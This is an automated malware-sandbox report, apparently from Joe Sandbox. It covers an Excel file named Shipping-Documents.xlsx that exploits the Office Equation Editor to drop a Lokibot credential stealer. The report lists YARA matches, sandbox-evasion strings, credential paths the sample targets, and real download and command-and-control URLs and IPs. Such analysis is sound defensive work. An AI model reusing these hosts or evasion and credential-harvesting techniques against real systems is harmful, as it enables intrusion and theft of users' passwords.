Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610280
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00610728
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040549C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004029D4
Source: Shipping-Documents.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00405B6F appears 42 times
Source: C:\Users\Public\vbc.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: regasm[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'CreateDecryptor'
Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Shipping-Documents.xlsx
Source: C:\Users\Public\vbc.exe | Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRFAD2.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Shipping-Documents.xlsx | Virustotal: Detection: 40%
Source: Shipping-Documents.xlsx | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Shipping-Documents.xlsx | Static file information: File size 1359872 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
Source: Shipping-Documents.xlsx | Initial sample: OLE indicators vbamacros = False
Source: Shipping-Documents.xlsx | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match | File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00D03CE4 push es; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00D03BE1 push es; retn 0000h
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0061885F push esp; retf 0017h
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00612433 pushad ; retf
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006120C2 push ss; iretd
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006120CC push ss; iretd
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0061318B push ebp; retf
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006162FD push es; retf
Source: C:\Users\Public\vbc.exe | Code function: 4_2_006147A5 push eax; retf 0017h
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402AC0 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00D03CE4 push es; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00D03BE1 push es; retn 0000h
Source: initial sample | Static PE information: section name: .text entropy: 7.61248422498
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOGPFAULTERRORBOX
Source: Shipping-Documents.xlsx | Stream path 'EncryptedPackage' entropy: 7.99980515236 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2940 | Thread sleep time: -104691s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2844 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2992 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 104691
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00406069 GetUserNameW,
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\Public\vbc.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\Public\vbc.exe | Code function: PopPassword
Source: C:\Users\Public\vbc.exe | Code function: SmtpPassword
Source: Yara match | File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Techniques are listed per tactic column; a number in parentheses is the report's count of matching signatures for that technique.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Exploitation for Client Execution (12); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Extra Window Memory Injection (1); Access Token Manipulation (1); Process Injection (111); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (31); Software Packing (2); Extra Window Memory Injection (1); Masquerading (111); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (111)
Credential Access: OS Credential Dumping (2); Credentials in Registry (2); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Account Discovery (1); File and Directory Discovery (2); System Information Discovery (13); Security Software Discovery (221); Virtualization/Sandbox Evasion (31); System Owner/User Discovery (1); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Man in the Browser (1); Data from Local System (2); Email Collection (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (15); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

              Behavior Graph

Behavior Graph ID: 435330
Sample: Shipping-Documents.xlsx
Startdate: 16/06/2021
Architecture: WINDOWS
Score: 100

Top-level signatures:
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• 14 other signatures

Process tree with graph annotations:
• EQNEDT32.EXE (started)
  • DNS/IP: 103.89.90.94, ports 49167, 80 (VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam)
  • Dropped: C:\Users\user\AppData\Local\...\regasm[1].exe, PE32
  • Dropped: C:\Users\Public\vbc.exe, PE32
  • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • vbc.exe (started)
    • Signature: Multi AV Scanner detection for dropped file
    • Signature: Tries to steal Mail credentials (via file registry)
    • Signature: Injects a PE file into a foreign processes
    • vbc.exe (started)
      • DNS/IP: 63.141.228.141, ports 49168, 49169, 49170 (NOCIXUS, United States)
      • Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      • Signature: Tries to steal Mail credentials (via file access)
      • Signature: Tries to harvest and steal ftp login credentials
      • Signature: Tries to harvest and steal browser information (history, passwords, etc)
• EXCEL.EXE (started)
  • Dropped: C:\Users\user\...\~$Shipping-Documents.xlsx, data


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
Shipping-Documents.xlsx | 41% | Virustotal | (none)
Shipping-Documents.xlsx | 31% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe | 11% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm
C:\Users\Public\vbc.exe | 11% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm

              Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.vbc.exe.355d638.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://103.89.90.94/pzldoc/regasm.exe | 0% | Avira URL Cloud | safe
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation (3 entries) | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation (3 entries) | safe
http://63.141.228.141/32.php/S4wFP8QBww9Tp | 0% | Avira URL Cloud | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation (3 entries) | safe
http://www.%s.comPA | 0% | URL Reputation (3 entries) | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation (3 entries) | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation (3 entries) | safe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://103.89.90.94/pzldoc/regasm.exe | true | Avira URL Cloud: safe | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe (3 entries) | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe (3 entries) | unknown
http://63.141.228.141/32.php/S4wFP8QBww9Tp | true | Avira URL Cloud: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe (3 entries) | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe (3 entries) | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp | false | (none) | high
http://www.day.com/dam/1.0 | A6AB76E0.emf.0.dr | false | (none) | high
http://www.ibsensoftware.com/ | vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.%s.comPA | vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
https://github.com/georgw777/MediaManager | vbc.exe | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmp | false | (none) | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp | false | (none) | high
https://github.com/georgw777/ | vbc.exe | false | (none) | high
https://github.com/georgw777/MediaManager;https://github.com/georgw777/ | vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.dr | false | (none) | high

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.89.90.94 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
63.141.228.141 | unknown | United States | 33387 | NOCIXUS | true

                            General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 435330
Start date: 16.06.2021
Start time: 12:28:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Shipping-Documents.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
